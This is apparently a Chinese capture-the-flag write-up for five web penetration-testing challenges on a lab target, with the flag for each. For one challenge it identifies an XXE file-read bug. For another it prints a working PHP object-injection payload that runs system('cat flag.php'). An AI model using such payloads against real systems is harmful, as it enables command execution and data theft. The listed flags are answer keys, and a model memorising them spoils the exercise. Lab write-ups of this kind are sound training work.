换环境有问题需要环境可以私信我
- 通过URL访问http://靶机IP/1,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;
FLAG=flag{Zf@BxsTo}
2通过URL访问http://靶机IP/2,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;
FLAG=flag{&k5#Be*m}
3.通过URL访问http://靶机IP/3,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;
发现flag在/etc目录下,说明要进行读取操作,再看xml的关键字,可以判断出是XML外部实体引用注入漏洞
抓包,添加payload
FLAG=flag{!Beb9idl}
4.通过URL访问http://靶机IP/4,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;
FLAG=flag{@GCwqrUH}
5.通过URL访问http://靶机IP/5,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;
<?php
class PHPObjectInjection {
public $inject = "system('cat flag.php');";
// $inject变量接收php执行语句
}
$a = new PHPObjectInjection; //创建指定类名
echo serialize($a); // 将结果进行序列化
?>
?r=O:18:"PHPObjectInjection":1:{s:6:"inject";s:23:"system('cat flag.php');";}
FLAG=flag{Ig5hs$e#}